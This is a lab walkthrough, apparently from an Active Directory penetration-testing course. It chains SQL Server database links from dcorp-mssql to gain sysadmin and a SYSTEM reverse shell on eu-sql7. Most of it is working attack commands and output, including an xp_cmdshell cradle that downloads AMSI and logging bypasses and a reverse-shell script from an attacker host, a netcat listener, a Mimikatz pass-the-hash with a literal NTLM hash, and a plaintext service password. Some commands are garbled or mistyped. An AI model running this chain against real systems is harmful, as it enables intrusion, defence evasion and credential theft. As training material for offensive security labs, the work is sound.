Learning Object 22
Tasks
1 – Get a reverse shell on a SQL server in eurocorp forest by abusing database links from dcorp-mssql
Flag 37 [dcorp-mssql] – First SQL Server linked to dcorp-mssql 🚩
Flag 38 [dcorp-mssql] – Name of SQL Server user used to establish link between dcorp-sql1 and dcorp-mgmt 🚩
Flag 39 [dcorp-mssql] – SQL Server privileges on eu-sql 🚩
Flag 40 [dcorp-mssql] – Privileges on operating system of eu-sql 🚩
Enable xp_cmdshell with sp_configure [ already enabled in the lab ]
The following code with enable xp_cmdshell using sp_configure. You need to issue the RECONFIGURE command after each of these settings for it to take effect.
-- this turns on advanced options and is needed to configure xp_cmdshell
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
-- this enables xp_cmdshell
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE.
Solutions
1 – Get a reverse shell on a SQL server in eurocorp forest by abusing database links from dcorp-mssql
Let’s start with enumerating SQL servers in the domain and if studentx has privileges to connect to any of them. We can use PowerUpSQL module for that. Run the below command from a PowerShell session started using Invisi-Shell:
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
Import-Module C:\AD\Tools\PowerUpSQL-master\PowerupSQL.psd1
Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose.
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat Import-Module C:\AD\Tools\PowerUpSQL-master\PowerupSQL.psd1 PS C:\Users\student98> Import-Module C:\AD\Tools\PowerUpSQL-master\PowerupSQL.psd1 WARNING: The names of some imported commands from the module 'PowerupSQL' include unapproved verbs that might make them less discoverable. To find the commands with unapproved verbs, run the Import-Module command again with the Verbose parameter. For a list of approved verbs, type Get-Verb. PS C:\Users\student98> Get-SQLInstanceDomain -Verbose VERBOSE: Grabbing SPNs from the domain for SQL Servers (MSSQL*)... VERBOSE: Parsing SQL Server instances from SPNs... VERBOSE: 6 instances were found. ComputerName : dcorp-mgmt.dollarcorp.moneycorp.local Instance : dcorp-mgmt.dollarcorp.moneycorp.local,1433 DomainAccountSid : 15000005210001391322314218022427222724713123394400 DomainAccount : svcadmin DomainAccountCn : svc admin Service : MSSQLSvc Spn : MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433 LastLogon : 4/1/2025 8:43 AM Description : Account to be used for services which need high privileges. ComputerName : dcorp-mgmt.dollarcorp.moneycorp.local Instance : dcorp-mgmt.dollarcorp.moneycorp.local DomainAccountSid : 15000005210001391322314218022427222724713123394400 DomainAccount : svcadmin DomainAccountCn : svc admin Service : MSSQLSvc Spn : MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local LastLogon : 4/1/2025 8:43 AM Description : Account to be used for services which need high privileges. ComputerName : dcorp-mssql.dollarcorp.moneycorp.local Instance : dcorp-mssql.dollarcorp.moneycorp.local,1433 DomainAccountSid : 15000005210001391322314218022427222724713123385400 DomainAccount : DCORP-MSSQL$ DomainAccountCn : DCORP-MSSQL Service : MSSQLSvc Spn : MSSQLSvc/dcorp-mssql.dollarcorp.moneycorp.local:1433 LastLogon : 12/3/2025 6:21 AM Description : ComputerName : dcorp-mssql.dollarcorp.moneycorp.local Instance : dcorp-mssql.dollarcorp.moneycorp.local DomainAccountSid : 15000005210001391322314218022427222724713123385400 DomainAccount : DCORP-MSSQL$ DomainAccountCn : DCORP-MSSQL Service : MSSQLSvc Spn : MSSQLSvc/dcorp-mssql.dollarcorp.moneycorp.local LastLogon : 12/3/2025 6:21 AM Description : ComputerName : dcorp-sql1.dollarcorp.moneycorp.local Instance : dcorp-sql1.dollarcorp.moneycorp.local,1433 DomainAccountSid : 15000005210001391322314218022427222724713123386400 DomainAccount : DCORP-SQL1$ DomainAccountCn : DCORP-SQL1 Service : MSSQLSvc Spn : MSSQLSvc/dcorp-sql1.dollarcorp.moneycorp.local:1433 LastLogon : 12/3/2025 6:20 AM Description : ComputerName : dcorp-sql1.dollarcorp.moneycorp.local Instance : dcorp-sql1.dollarcorp.moneycorp.local DomainAccountSid : 15000005210001391322314218022427222724713123386400 DomainAccount : DCORP-SQL1$ DomainAccountCn : DCORP-SQL1 Service : MSSQLSvc Spn : MSSQLSvc/dcorp-sql1.dollarcorp.moneycorp.local LastLogon : 12/3/2025 6:20 AM Description :
Find out to which SQL servers we can connect
PS C:\Users\student98> Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose VERBOSE: Creating runspace pool and session states VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local,1433 : Connection Success. VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local : Connection Success. VERBOSE: dcorp-mgmt.dollarcorp.moneycorp.local : Connection Failed. VERBOSE: dcorp-mgmt.dollarcorp.moneycorp.local,1433 : Connection Failed. VERBOSE: dcorp-sql1.dollarcorp.moneycorp.local,1433 : Connection Failed. VERBOSE: dcorp-sql1.dollarcorp.moneycorp.local : Connection Failed. VERBOSE: DCORP-STD98 : Connection Failed. VERBOSE: Closing the runspace pool ComputerName Instance Status ------------ -------- ------ dcorp-mssql.dollarcorp.moneycorp.local dcorp-mssql.dollarcorp.moneycorp.local Accessible dcorp-mssql.dollarcorp.moneycorp.local dcorp-mssql.dollarcorp.moneycorp.local,1433 Accessible dcorp-mgmt.dollarcorp.moneycorp.local dcorp-mgmt.dollarcorp.moneycorp.local Not Accessible dcorp-mgmt.dollarcorp.moneycorp.local dcorp-mgmt.dollarcorp.moneycorp.local,1433 Not Accessible dcorp-sql1.dollarcorp.moneycorp.local dcorp-sql1.dollarcorp.moneycorp.local,1433 Not Accessible dcorp-sql1.dollarcorp.moneycorp.local dcorp-sql1.dollarcorp.moneycorp.local Not Accessible DCORP-STD98 DCORP-STD98 Not Accessible PS C:\Users\student98>
So, we can connect to dcorp-mssql. Using HeidiSQL client, let’s login to dcorp-mssql using windows authentication of studentx. After login, enumerate linked databases on dcorp-mssql:
Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -VerbosePS C:\Users\student98> Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose VERBOSE: dcorp-mgmt.dollarcorp.moneycorp.local,1433 : Connection Failed. VERBOSE: dcorp-mgmt.dollarcorp.moneycorp.local : Connection Failed. VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local,1433 : Connection Success. VERBOSE: dcorp-mssql.dollarcorp.moneycorp.local : Connection Success. VERBOSE: dcorp-sql1.dollarcorp.moneycorp.local,1433 : Connection Failed. VERBOSE: dcorp-sql1.dollarcorp.moneycorp.local : Connection Failed. ComputerName : dcorp-mssql.dollarcorp.moneycorp.local Instance : DCORP-MSSQL DomainName : dcorp ServiceProcessID : 1916 ServiceName : MSSQLSERVER ServiceAccount : NT AUTHORITY\NETWORKSERVICE AuthenticationMode : Windows and SQL Server Authentication ForcedEncryption : 0 Clustered : No SQLServerVersionNumber : 15.0.2000.5 SQLServerMajorVersion : 2019 SQLServerEdition : Developer Edition (64-bit) SQLServerServicePack : RTM OSArchitecture : X64 OsVersionNumber : SQL Currentlogin : dcorp\student98 IsSysadmin : No ActiveSessions : 1 ComputerName : dcorp-mssql.dollarcorp.moneycorp.local Instance : DCORP-MSSQL DomainName : dcorp ServiceProcessID : 1916 ServiceName : MSSQLSERVER ServiceAccount : NT AUTHORITY\NETWORKSERVICE AuthenticationMode : Windows and SQL Server Authentication ForcedEncryption : 0 Clustered : No SQLServerVersionNumber : 15.0.2000.5 SQLServerMajorVersion : 2019 SQLServerEdition : Developer Edition (64-bit) SQLServerServicePack : RTM OSArchitecture : X64 OsVersionNumber : SQL Currentlogin : dcorp\student98 IsSysadmin : No ActiveSessions : 1
.
PS C:\Users\student98> Get-SQLServerLink -Instance dcorp-mssql -Verbose VERBOSE: dcorp-mssql : Connection Success. ComputerName : dcorp-mssql Instance : dcorp-mssql DatabaseLinkId : 0 DatabaseLinkName : DCORP-MSSQL DatabaseLinkLocation : Local Product : SQL Server Provider : SQLNCLI Catalog : LocalLogin : RemoteLoginName : is_rpc_out_enabled : True is_data_access_enabled : False modify_date : 11/14/2022 4:46:10 AM ComputerName : dcorp-mssql Instance : dcorp-mssql DatabaseLinkId : 1 DatabaseLinkName : DCORP-SQL1 DatabaseLinkLocation : Remote Product : SQL Server Provider : SQLNCLI Catalog : LocalLogin : RemoteLoginName : is_rpc_out_enabled : False is_data_access_enabled : True modify_date : 12/4/2022 5:16:19 AM
.
PS C:\Users\student98> Get-SQLServerLinkCrawl -Instance dcorp-mssql -Verbose
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: --------------------------------
VERBOSE: Server: DCORP-MSSQL
VERBOSE: --------------------------------
VERBOSE: - Link Path to server: DCORP-MSSQL
VERBOSE: - Link Login: dcorp\student98
VERBOSE: - Link IsSysAdmin: 0
VERBOSE: - Link Count: 1
VERBOSE: - Links on this server: DCORP-SQL1
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: --------------------------------
VERBOSE: Server: DCORP-SQL1
VERBOSE: --------------------------------
VERBOSE: - Link Path to server: DCORP-MSSQL -> DCORP-SQL1
VERBOSE: - Link Login: dblinkuser
VERBOSE: - Link IsSysAdmin: 0
VERBOSE: - Link Count: 1
VERBOSE: - Links on this server: DCORP-MGMT
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: --------------------------------
VERBOSE: Server: DCORP-MGMT
VERBOSE: --------------------------------
VERBOSE: - Link Path to server: DCORP-MSSQL -> DCORP-SQL1 -> DCORP-MGMT
VERBOSE: - Link Login: sqluser
VERBOSE: - Link IsSysAdmin: 0
VERBOSE: - Link Count: 1
VERBOSE: - Links on this server: EU-SQL7.EU.EUROCORP.LOCAL
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: dcorp-mssql : Connection Success.
VERBOSE: --------------------------------
VERBOSE: Server: EU-SQL7
VERBOSE: --------------------------------
VERBOSE: - Link Path to server: DCORP-MSSQL -> DCORP-SQL1 -> DCORP-MGMT -> EU-SQL7.EU.EUROCORP.LOCAL
VERBOSE: - Link Login: sa
VERBOSE: - Link IsSysAdmin: 1
VERBOSE: - Link Count: 0
VERBOSE: - Links on this server:
Version : SQL Server 2019
Instance : DCORP-MSSQL
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL}
User : dcorp\student98
Links : {DCORP-SQL1}
Version : SQL Server 2019
Instance : DCORP-SQL1
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1}
User : dblinkuser
Links : {DCORP-MGMT}
Version : SQL Server 2019
Instance : DCORP-MGMT
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User : sqluser
Links : {EU-SQL7.EU.EUROCORP.LOCAL}
Version : SQL Server 2019
Instance : EU-SQL7
CustomQuery :
Sysadmin : 1
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL7.EU.EUROCORP.LOCAL}
User : sa
Links :
.
So, there is a database link to dcorp-sql1 from dcorp-mssql. Let’s enumerate further links from dcorpsql1. This can be done with the help of openquery:
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xo_cmdshell 'whoami'"
If xp_cmdshell is enabled (or RPC out is true - which is set to false in this case), it is possible to execute commands on eu-sql using linked databases. To avoid dealing with a large number of quotes and escapes, we can use the following command:PS C:\Users\student98> Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query "exec master..xp_cmdshell 'cmd /c set username'"
Version : SQL Server 2019
Instance : DCORP-MSSQL
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL}
User : dcorp\student98
Links : {DCORP-SQL1}
Version : SQL Server 2019
Instance : DCORP-SQL1
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1}
User : dblinkuser
Links : {DCORP-MGMT}
Version : SQL Server 2019
Instance : DCORP-MGMT
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User : sqluser
Links : {EU-SQL7.EU.EUROCORP.LOCAL}
Version : SQL Server 2019
Instance : EU-SQL7
CustomQuery : {USERNAME=SYSTEM, }
Sysadmin : 1
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL7.EU.EUROCORP.LOCAL}
User : sa
Links :
Sweet! We have sysadmin on eu-sql server!
We can also use Get-SQLServerLinkCrawl for crawling the database links automatically:
select * from openquery("DCORP-SQL7",'select * from openquery("DCORP-MGMT",''select * from master..sysservers'')').
——–
Create Invoke-PowerShellTcpEx.ps1:
-
Create a copy of Invoke-PowerShellTcp.ps1 and rename it to Invoke-PowerShellTcpEx.ps1.
-
Open Invoke-PowerShellTcpEx.ps1 in PowerShell ISE (Right click on it and click Edit).
-
Add “Power -Reverse -IPAddress 172.16.100.X -Port 443” (without quotes) to the end of the file.
Let’s try to execute a PowerShell download execute cradle to execute a PowerShell reverse shell on the eu-sql instance, first to it, add sw on HFS and remember to edit Invoke-PowerShellTcpEx changing IP and Port
After that start a listener in a new shell: C:\AD\Tools\netcat-win32-1.12\nc64.exe -lvp 443
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec master..xp_cmdshell ''powershell -c "iex (iwr -UseBasicParsing http://172.16.100.67/sbloggingbypass.txt);iex (iwr -UseBasicParsing http://172.16.100.67/amsibypass.txt);iex (iwr -UseBasicParsing http://172.16.100.67/Invoke-PowerShellTcpEx.ps1)"''' -QueryTarget eu-sql45.
PS C:\Users\student98> Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec master..xp_cmdshell ''powershell -c "iex (iwr -UseBasicParsing http://172.16.100.98/sbloggingbypass.txt);iex (iwr -UseBasicParsing http://172.16.100.98/amsibypass.txt);iex (iwr -UseBasicParsing http://172.16.100.98/Invoke-PowerShellTcpEx.ps1)"''' -QueryTarget eu-sql7
Version : SQL Server 2019
Instance : DCORP-MSSQL
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL}
User : dcorp\student98
Links : {DCORP-SQL1}
Version : SQL Server 2019
Instance : DCORP-SQL1
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1}
User : dblinkuser
Links : {DCORP-MGMT}
Version : SQL Server 2019
Instance : DCORP-MGMT
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User : sqluser
Links : {EU-SQL7.EU.EUROCORP.LOCAL}
Version : SQL Server 2019
Instance : EU-SQL7
CustomQuery :
Sysadmin : 1
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQL7.EU.EUROCORP.LOCAL}
User : sa
Links :
.
On the listener:
C:\AD\Tools\netcat-win32-1.12\nc64.exe -lvp 443
$env:username
$env:computernameC:\Users\student98>c:\ad\Tools\netcat-win32-1.12\nc64.exe -lvp 443 listening on [any] 443 ... 172.16.15.17: inverse host lookup failed: h_errno 11004: NO_DATA connect to [172.16.100.98] from (UNKNOWN) [172.16.15.17] 55720: NO_DATA Windows PowerShell running as user SYSTEM on EU-SQL7 Copyright (C) 2015 Microsoft Corporation. All rights reserved. PS C:\Windows\system32>whoami nt authority\system PS C:\Windows\system32> hostname eu-sql7 PS C:\Windows\system32>ls env:
.
If there was only 1 SQL server where we are sysadmin the quey would be
Invoke-SQLOSCmd -Verbose -Command "powershell iex(New-Object Net.Webclient).Down.....' -Instance DCORP-MSSQL"
PS C:\Users\student98> Invoke-SQLOSCmd -Verbose -Command "powershell iex(New-Object Net.Webclient).DownloadString('http://172.16.100.89/Invoke-PowerShellTcp.ps1' -Instance DCORP-MSSQL"
VERBOSE: Creating runspace pool and session states
VERBOSE: DCORP-STD98 : Connection Failed.
VERBOSE: Closing the runspace pool
ComputerName Instance CommandResults
------------ -------- --------------
DCORP-STD98 DCORP-STD98 Not Accessible
note : dcorp-mssql is a server without a GUI
C:\Users\student98>runas /user:svcadmin@dollarcorp.moneycorp.local /netonly cmd Enter the password for svcadmin@dollarcorp.moneycorp.local: Attempting to start cmd as user "svcadmin@dollarcorp.moneycorp.local" ... *ThisisBlasphemyThisisMadness!! C:\Windows\system32>winrs -r:dcorp-mssql cmd Microsoft Windows [Version 10.0.20348.2762] (c) Microsoft Corporation. All rights reserved. C:\Users\svcadmin>hostname hostname dcorp-mssql C:\Users\svcadmin>Set-ItemProperty -Path "HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" -Name "fDenyTSConnections" -Value 0 -ErrorAction Stop
note heidissql can be used to connect to dcorp-mssql
.
.
Invoke-Mimi -Command '"sekurlsa::pth /user:sqladmin /domain:dcorp /ntlm:07e8be316e3da9a042a9cb681df19bf5 /run:cmd.exe"'
PS C:\AD\Tools> . .\Invoke-Mimi.ps1 PS C:\AD\Tools> Invoke-Mimi -Command '"sekurlsa::pth /user:sqladmin /domain:dcorp /ntlm:07e8be316e3da9a042a9cb681df19bf5 /run:cmd.exe"'
.
.
.
Flag 37 [dcorp-mssql] – First SQL Server linked to dcorp-mssql 🚩
The first SQL Server linked to dcorp-mssql is DCORP-SQL1.
Links on this server: DCORP-SQL1Flag 38 [dcorp-mssql] – Name of SQL Server user used to establish link between dcorp-sql1 and dcorp-mgmt 🚩
sqluser is the name of SQL Server user used to establish link between dcorp-sql1 and dcorp-mgmt.
Server: EU-SQLX
- Link IsSysAdmin: 1Flag 39 [dcorp-mssql] – SQL Server privileges on eu-sql 🚩
The SQL Server privileges on eu-sql is sysadmin.
Server: EU-SQLX
- Link IsSysAdmin: 1Flag 40 [dcorp-mssql] – Privileges on operating system of eu-sql 🚩
PS C:\Windows\system32>$env:username
system